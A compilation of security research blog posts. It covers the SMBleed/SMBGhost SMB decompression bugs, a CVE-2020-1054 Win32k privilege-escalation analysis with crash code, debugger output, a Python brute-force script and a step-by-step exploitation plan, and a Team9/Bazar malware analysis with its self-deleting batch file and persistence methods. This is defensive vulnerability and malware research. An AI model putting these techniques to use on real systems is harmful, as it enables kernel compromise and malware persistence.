  • length <= y: In this case the whole compressed block will consist out of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
  • length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.

Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:

  1. Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
  2. Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.

Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the initialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out of bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.

The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation, it required sending a large number of packets, hurting performance and stability.

ZecOps Detection

ZecOps classify forensics logs related to this issue as the following tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.


You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Part II – Summary

In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.

CVE-2020-1054 Analysis

15 June 2020 at 14:00

This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).

The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

int main(int argc, char *argv[])
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

image 1

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be continually referenced to throughout the blog post. This value changes across system reboots and sometimes per program execution, however for the sake of continuity will remain the same.

Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

image 2

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

image 3

rcx is added to by a constant value in the loop. Looking at the assembly this is add ecx, eax. A psuedo-code loop snippet:

var_64h = 0x7fffffff; 
var_6ch = 0x80000000;
while ( r11d )
    if ( ebp >= var_6ch && ebp < var_6ch )
        // oob read/write in here
    ecx += eax;

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical, but it gives the feeling that it is related to arg5 of DrawIconEx. Changing the value from 0xfebffffc to 0xfebffffd:

fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd00000 there is a major change to oob_target:

fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5 the lower 32 bits of oob_target remains c7000240. Additionally, a decrease in the value of arg5 (treating as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

image 4

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

image 5

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjecent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SUFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function, vInitStrDDA in the notes.txt file of my GitHub repo contains extra detail.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
mov     dword ptr [r14],esi
// write 2
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

image 5

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of the DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is equivalent to DI_IMAGE which “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.

Exploitation Strategy

Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilites are a far cry from an all powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan01 and sizlBitmap. pvScan01 points to the actual bitmap data. This data can be read/written to using GetBitmapBits and SetBitMapBits. sizlBitMap is two dwords that contain the height and width of the bitmap. Clasically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan01 with the value of the second SURFOBJ’s (referred to as Worker) pvScan01 address. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan01 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan01 using a call to SetBitMapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan01 address can be overwritten. This second SURFOBJ can then be used via SetBitMapBits for a powerful write-what-where primitive.

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c700000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocted at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
2. Calculate loop_iterations*lDelta such that it is equal to fffff901'c7000240.
3. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
4. Use SetBitMapBits with second SURFOBJ to overwrite pvScan01 of third SURFOBJ.
5. Arbitrary reusable write is now obtained.
6. Typical EoP overwrite process token privileges and inject into winlogon.exe.

A bad visual represenation:

image 6

Every step is easily accomplished with the exception of step 3. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. This is guaranteed to increase the OR’d value, which is what is required. Accurately targeting width or height of sizlBitmap is the challenge. It may be recalled in the start of the blog post oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

image 7

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

image 8

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in psuedo code as:

intial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
    write_location_1 = intial_value + lDelta * loop_count;
    write location_2 = write_location_1 + 4;

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s csizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...") 

# start with size at 0x50000 
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8 
    # lDelta is always byte alligned so ignore if not
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0,0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, \
                    loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))

Now that all values are understood, all that remains is to write the exploit code.

Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

image 9

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvment to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending if the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.

Thanks to Netanel Ben-Simon, Yoav Alon and bee130y for finding the bug:

SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

9 June 2020 at 17:40
SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost


  • While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
  • SMBleed allows to leak kernel memory remotely.
  • Combined with SMBGhost, which was patched three months ago, SMBleed allows to achieve pre-auth Remote Code Execution (RCE).
  • POC #1: SMBleed remote kernel memory read: POC #1 Link
  • POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link


The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.

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An observation

The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver.  Below is a simplified version of the function, with the irrelevant details omitted:

    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;

typedef struct _ALLOCATION_HEADER
    // ...
    PVOID UserBuffer;
    // ...

    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
    If (!Alloc) {

    ULONG FinalCompressedSize = 0;

    NTSTATUS Status = SmbCompressionDecompress(
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        return STATUS_BAD_DATA;

    if (Header->Offset > 0) {
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),

    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

The SMBGhost bug happened due to lack of integer overflow checks. It was fixed by Microsoft and even though we didn’t add it to our function to keep it simple, this time we will assume that the function checks for integer overflows and discards the message in these cases. Even with these checks in place, there’s still a serious bug. Can you spot it?

Faking OriginalCompressedSegmentSize again

Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:

The uninitialized kernel data is going to be treated as a part of our message.

If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    return STATUS_BAD_DATA;

Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
    if (status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;

    // ...

    return Status;

In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only this seemingly unnecessary, deliberate update of the FinalCompressedSize value made the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.

Basic exploitation

The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:

// HACK: fake size
if (((Smb2SinglePacket)packet).Header.Command == Smb2Command.WRITE)
    ((Smb2WriteRequestPacket)packet).PayLoad.Length += 0x1000;
    compressedPacket.Header.OriginalCompressedSegmentSize += 0x1000;

Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.

SMBleed POC Source Code

Affected Windows versions

Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrino we saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.

An unpatched system, null pointer dereference happens here.
A patched system, the added null pointer check.

Here’s a summary of the affected Windows versions with the relevant updates installed:

Windows 10 Version 2004

Update SMBGhost SMBleed
KB4557957 Not Vulnerable Not Vulnerable
Before KB4557957 Not Vulnerable Vulnerable

Windows 10 Version 1909

Update SMBGhost SMBleed
KB4560960 Not Vulnerable Not Vulnerable
KB4551762 Not Vulnerable Vulnerable
Before KB4551762 Vulnerable Vulnerable

Windows 10 Version 1903

Update Null Dereference Bug SMBGhost SMBleed
KB4560960 Fixed Not Vulnerable Not Vulnerable
KB4551762 Fixed Not Vulnerable Vulnerable
KB4512941 Fixed Vulnerable Vulnerable
None of the above Not Fixed Vulnerable Potentially vulnerable*

* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)

SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE

Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for  evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC. 

SMBGhost + SMBleed RCE POC Source Code


ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis, a network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at [email protected] for more information.


You can remediate both SMBleed and SMBGhost by doing one or more of the following things:

  1. Windows update will solve the issues completely (recommended)
  2. Blocking port 445 will stop lateral movements using these vulnerabilities
  3. Enforcing host isolation
  4. Disabling SMB 3.1.1 compression (not a recommended solution)

Shout out to Chompie that exploited this bug with a different technique. Chompie’s POC is available here.

In-depth analysis of the new Team9 malware family

2 June 2020 at 14:00

Author: Nikolaos Pantazopoulos
Co-author: Stefano Antenucci (@Antelox)
And in close collaboration with NCC’s RIFT.

1. Introduction

Publicly discovered in late April 2020, the Team9 malware family (also known as ‘Bazar [1]’) appears to be a new malware being developed by the group behind Trickbot. Even though the development of the malware appears to be recent, the developers have already developed two components with rich functionality. The purpose of this blog post is to describe the functionality of the two components, the loader and the backdoor.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection rules to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

2. Early variant of Team9 loader

We assess that this is an earlier variant of the Team9 loader (35B3FE2331A4A7D83D203E75ECE5189B7D6D06AF4ABAC8906348C0720B6278A4) because of its simplicity and the compilation timestamp. The other variant was compiled more recently and has additional functionality. It should be noted that in very early versions of the loader binaries (2342C736572AB7448EF8DA2540CDBF0BAE72625E41DAB8FFF58866413854CA5C), the developers were using the Windows BITS functionality in order to download the backdoor. However, we believe that this functionality has been dropped.

Before proceeding to the technical analysis part, it is worth mentioning that the strings are not encrypted. Similarly, the majority of the Windows API functions are not loaded dynamically.

When the loader starts its execution, it checks if another instance of itself has infected the host already by attempting to read the value ‘BackUp Mgr’ in the ‘Run’ registry key ‘Software\Microsoft\Windows\CurrentVersion\Run’ (Figure 1). If it exists, it validates if the current loaders file path is the same as the one that has already been set in the registry value’s data (BackUp Mgr). Assuming that all of the above checks were successful, the loader proceeds to its core functionality.


Figure 1 – Loader verifies if it has already infect the host

However, if any of the above checks do not meet the requirements then the loader does one of the following actions:

  1. Copy itself to the %APPDATA%\Microsoft folder, add this file path in the registry ‘Run’ key under the value ‘BackUp Mgr’ and then execute the loader from the copied location.
  2. If the loader cannot access the %APPDATA% location or if the loader is running from this location already, then it adds the current file path in the ‘Run’ registry key under the value ‘BackUp Mgr’ and executes the loader again from this location.

When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix ‘tmp’ followed by random digits. The batch file content:

@echo off
set Module=%1
del %Module%
if exist %Module% goto Repeat
del %0

Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download.

The core functionality of the loader is to download the Team9 backdoor component. The loader contains two ‘.bazar’ top-level domains which point to the Team9 backdoor. Each domain hosts two versions of the Team9 backdoor on different URIs, one for each Windows architecture (32-bit and 64-bit), the use of two domains is highly likely to be a backup method.

Any received files from the command and control server are sent in an encrypted format. In order to decrypt a file, the loader uses a bitwise XOR decryption with the key being based on the infected host’s system time (Year/Month/Day) (Figure 2).


Figure 2 – Generate XOR key based on infected host’s time

As a last step, the loader verifies that the executable file was decrypted successfully by validating the PE headers. If the Windows architecture is 32-bit, the loader injects the received executable file into ‘calc.exe’ (Windows calculator) using the ‘Process Hollowing’ technique. Otherwise, it writes the executable file to disk and executes it.

The following tables summarises the identified bazar domains and their URIs found in the early variants of the loader.

URI Description
/api/v108 Possibly downloads the 64-bit version of the Team9 backdoor
/api/v107 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v5 Possibly downloads an updated 32-bit version of the Team9 loader
/api/v6 Possibly downloads an updated 64-bit version of the Team9 loader
/api/v7 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v8 Possibly downloads the 64-bit version of the Team9 backdoor

Table 1 – Bazar URIs found in early variants of the loader

The table below (table 2) summarises the identified domains found in the early variants of the loader.

Bazar domains

Table 2 – Bazar domains found in early variants of the loader

Lastly, another interesting observation is the log functionality in the binary file that reveals the following project file path:


3. Latest variant of Team9 loader

In this section, we describe the functionality of a second loader that we believe to be the latest variant of the aforementioned Team9 loader. This assessment is based on three factors:

  1. Similar URIs in the backdoor requests
  2. Similar payload decryption technique
  3. Similar code blocks

Unlike its previous version, the strings are encrypted and the majority of Windows API functions are loaded dynamically by using the Windows API hashing technique.

Once executed, the loader uses a timer in order to delay the execution. This is likely used as an anti-sandbox method. After the delayed time has passed, the loader starts executing its core functionality.

Before the malware starts interacting with the command and control server, it ensures that any other related files produced by a previous instance of the loader will not cause any issues. As a result the loader appends the string ‘_lyrt’ to its current file path and deletes any file with this name. Next, the loader searches for the parameter ‘-p’ in the command line and if found, it deletes the scheduled task ‘StartDT’. The loader creates this scheduled task later for persistence during execution. The loader also attempts to execute hijacked shortcut files, which will eventually execute an instance of Team9 loader. This functionality is described later.

The loader performs a last check to ensure that the operating systems keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name ‘ld_201127’. The latter is to avoid double execution of its own instance.

As mentioned previously, the majority of Windows API functions are loaded dynamically. However, in an attempt to bypass any API hooks set by security products, the loader manually loads ‘ntdll’ from disk, reads the opcodes from each API function and compares them with the ones in memory (Figure 3). If the opcodes are different, the loader assumes a hook has been applied and removes it. This applies only to 64-bit samples reviewed to date.


Figure 3 – Scan for hooks in Windows API functions

The next stage downloads from the command and control server either the backdoor or an updated version of the loader. It is interesting to note that there are minor differences in the loader’s execution based on the identified Windows architecture and if the ‘-p’ parameter has been passed into the command line.

Assuming that the ‘-p’ parameter has not been passed into the command line, the loader has two loops. One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version.

The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not ‘’. Both of these methods are also present in the latest Team9 backdoor variants.

As with the previous Team9 loader variant, the command and control server sends back the binary files in an encrypted format. The decryption process is similar with its previous variant but with a minor change in the XOR key generation, the character ‘3’ is added between each hex digit of the day format (Figure 4). For example:

332330332330330335331338 (ASCII format, host date: 2020-05-18)


Figure 4 – Add the character ‘3’ in the generated XOR key

If the ‘-p’ parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes:

  1. Svchost
  2. Explorer
  3. cmd

Whenever a binary file is successfully downloaded and properly decrypted, the loader adds or updates its persistence in the infected host. The persistence methods are available in table 3.

Persistence Method Persistence Method Description
Scheduled task The loader creates two scheduled tasks, one for the updated loader (if any) and one for the downloaded backdoor. The scheduled task names and timers are different.
Winlogon hijack Add the malware’s file path in the ‘Userinit’ registry value. As a result, whenever the user logs in the malware is also executed.
Shortcut in the Startup folder The loaders creates a shortcut, which points to the malware file, in the Startup folder. The name of the shortcut is ‘adobe’.
Hijack already existing shortcuts The loader searches for shortcut files in Desktop and its subfolders. If it finds one then it copies the malware into the shortcut’s target location with the application’s file name and appends the string ‘__’ at the end of the original binary file name. Furthermore, the loader creates a ‘.bin’ file which stores the file path, file location and parameters. The ‘.bin’ file structure can be found in the Appendix section. When this structure is filled in with all required information, It is encrypted with the XOR key 0x61.

Table 3 – Persistence methods loader

The following tables summarises the identified bazar domains and their URIs for this Team9 loader variant.

URI Description
/api/v117 Possibly downloads the 32-bit version of the Team9 loader
/api/v118 Possibly downloads the 64-bit version of the Team9 loader
/api/v119 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v120 Possibly downloads the 64-bit version of the Team9 backdoor
/api/v85 Possibly downloads the 32-bit version of the Team9 loader
/api/v86 Possibly downloads the 64-bit version of the Team9 loader
/api/v87 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v88 Possibly downloads the 64-bit version of the Team9 backdoor

Table 4 – Identified URIs for Team9 loader variant

Bazar domain

Table 5 – Identified domains for Team9 loader variant

4. Team9 backdoor

We are confident that this is the backdoor which the loader installs onto the compromised host. In addition, we believe that the first variants of the Team9 backdoor started appearing in the wild in late March 2020. Each variant does not appear to have major changes and the core of the backdoor remains the same.

During analysis, we identified the following similarities between the backdoor and its loader:

  1. Creates a mutex with a hardcoded name in order to avoid multiple instances running at the same time (So far the mutex names which we have identified are ‘mn_185445’ and ‘{589b7a4a-3776-4e82-8e7d-435471a6c03c}’)
  2. Verifies that the keyboard and the operating system language is not Russian
  3. Use of Emercoin domains with a similarity in the domain name choice

Furthermore, the backdoor generates a unique ID for the infected host. The process that it follows is:

  1. Find the creation date of ‘C:\Windows’ (Windows FILETIME structure format). The result is then converted from a hex format to an ASCII representation. An example is shown in figures 5 (before conversion) and 6 (after conversion).
  2. Repeat the same process but for the folder ‘C:\Windows\System32’
  3. Append the second string to the first with a bullet point as a delimiter. For example, 01d3d1d8 b10c2916.01d3d1d8 b5b1e079
  4. Get the NETBIOS name and append it to the previous string from step 3 along with a bullet point as a delimiter. For example: 01d3d1d8 b10c2916.01d3d1d8 b5b1e079.DESKTOP-4123EEB.
  5. Read the volume serial number of C: drive and append it to the previous string. For example: 01d3d1d8 b10c2916.01d3d1d8 b5b1e079.DESKTOP-SKCF8VA.609fbbd5
  6. Hash the string from step 5 using the MD5 algorithm. The output hash is the bot ID.

Note: In a few samples, the above algorithm is different. The developers use hard-coded dates, the Windows directory file paths in a string format (‘C:\Windows’ and ‘C:\Windows\system32’) and the NETBIOS name. Based on the samples’ functionality, there are many indications that these binary files were created for debugging purposes.


Figure 5 – Before conversion


Figure 6 – After conversion

4.1 Network communication

